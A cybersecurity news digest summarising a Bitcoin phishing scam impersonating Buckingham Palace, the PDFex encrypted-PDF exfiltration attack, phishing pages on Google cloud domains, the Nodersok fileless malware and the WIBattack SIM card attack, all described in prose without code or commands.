New Bitcoin scam impersonates the Queen’s private office in Buckingham Palace to trick users

A new bitcoin fraud scam has been found tricking users to make donations to help the UK fund its Brexit process. The scam is carried out using phishing emails that appear to come from the Queen’s private office in Buckingham Palace. The email asks the recipients to make a donation in Bitcoins with a promise of 30% interest for a three-month loan. To make it look less suspicious, the email also promises to offer membership of the Royal Warrant Holders Association that supports businesses and individuals that supply goods or services to the palace for at least five years. The email includes a deadline in order to create a sense of urgency among the recipients. In addition, the recipients are also asked to keep its contents secret to avoid it going viral, Forbes reported. Scammers are increasingly using social engineering techniques and real-time -based sensitive situations to garner sympathy as well as sensitive details from users. In most cases, such scams result in individuals parting away with a huge amount of money.

 

New attack dubbed ‘PDFex’ can exfiltrate data from encrypted PDF files

Researchers have detailed a new attack that can exfiltrate data from encrypted Portable Document Format (PDF) files. Dubbed ‘PDFex’, the attack comes in two technique variants. The researchers tested the PDFex attack techniques against 27 widely used PDF viewers including Adobe Acrobat, Foxit Reader, Evince, Nitro, and Chrome and Firefox's built-in PDF viewers, and found all of them to be vulnerable. An attacker can manipulate an encrypted PDF file, even without knowing the corresponding password. PDF encryption uses the Cipher Block Chaining (CBC) encryption mode with no integrity checks, this allows anyone to create self-exfiltrating ciphertext parts using CBC malleability gadgets. Most of the data formats allow us to encrypt only parts of the content. This encryption flexibility allows an attacker to include their own content, which can lead to exfiltration channels. “More precisely, the PDF specification allows the mixing of ciphertexts with plaintexts. In combination with further PDF features which allow the loading of external resources via HTTP, the attacker can run direct exfiltration attacks once a victim opens the file,” researchers described in a blog. The two variants of PDFex attack include Direct Exfiltration and CBC Gadgets.

 

Threat actors abuse Google domains appspot.com and web.app in latest phishing attacks

After Microsoft Azure domains, threat actors are now eyeing on Google cloud domains to launch the latest phishing attacks. The affected domains are those that leverage Appspot.com and Web.app. Appspot.com is a cloud computing platform used for developing and hosting web applications in Google-managed data centers. On the other hand, Web.app is a mobile platform used for building mobile apps hosted by Firebase. According to the researchers from Zscaler ThreatLabZ, these campaigns make use of SSL certificates issued by Appspot.com and Web.app. The attackers have designed similar-looking login pages for the domains which are widely used in business. These fake-looking login pages include pages for Dropbox Business, Microsoft Outlook & SharePoint and DocuSign. The purpose of these pages is to capture login credentials which are later sent to a remote server controlled by attackers. To evade detection, the attackers are leveraging most of the code written in an external JavaScript code. The attackers are using the latest tactics to evade detection from scan engines, with most of the code written in an external JavaScript file. This filename is 32 characters long and different for every site.

 

New malware dubbed Nodersok discovered by researchers

A new malware dubbed Nodersok that abuses legitimate tools has been observed. Consumers, primarily in Europe and the United States have been the victim of the Nodersok campaign spanning across the last few weeks. The attack relies on an elusive network infrastructure and makes use of advanced fileless techniques. Nodersok has been observed to abuse legitimate tools that are already present in the machines. ‘Node.exe’, the Windows implementation of the Node.js framework and ‘WinDivert’, a network capture and manipulation utility are the legitimate tools involved in this campaign. The malware contains a PowerShell module that attempts to disable Windows Update and Windows Defender. “Like the Astaroth campaign, every step of the infection chain only runs legitimate LOLBins, either from the machine itself or downloaded third-party ones. All of the relevant functionalities reside in scripts and shellcodes that are almost always coming in encrypted, are then decrypted, and run while only in memory,” say the researchers from Microsoft. The primary victims of this campaign have been noted to be consumers, but around 3% of the attacks have been aimed at various organizations. Infection by the Nodersok is a multi-stage process that downloads multiple components to the infected system. The attack is initiated when the user downloads and runs a specific HTML application (HTA). The HTA file reaches out to randomly named domain to download JavaScript code. These domains have been observed to be short-lived. Various instances of PowerShell are launched to install various modules in the infected system. The malware has also been analyzed by researchers at Cisco, who’re calling it ‘Divergent’. While the Microsoft report says that the infected machines are turned into proxies for malicious activities, the Cisco report says that attackers use the proxies for click-fraud.

 

Researchers disclose new SIM card attack dubbed ‘WIBattack’

Researchers from Ginno Security Labs have detailed a new SIM card attack which is similar to the Simjacker attack. Dubbed WIBattack, this attack vector allows attackers to track users' devices by exploiting the Wireless Internet Browser (WIB) apps that are running on SIM cards. In order to exploit WIB apps, attackers need to send a specially formatted binary SMS (called an OTA SMS) that will execute STK (SIM Toolkit) instructions on SIM cards. Attackers send malicious OTA SMS that contains WIB commands to the victim's phone number. Once the victim receives the OTA SMS it forwards the command to the WIB app in the victim’s Simcard. WIB responds to the command and sends PROACTIVE COMMAND to victim mobile phones, such as initiating a call, send SMS, and other info. Following this, an attacker can track the victim's location, send SMS to any number, or call to any number and eavesdrop conversations. Ginno Security Lab researchers noted that an estimated number of hundreds of millions of devices are running SIM cards with a WIB app. In order to uncover the vulnerabilities in the WIB app, researchers recommend testing SIM cards with the SIMtester app. Furthermore, the researchers are in the process of developing a SIM scanning device that runs on android devices.

 

Edited and compiled by cyber security specialist James Aguilan.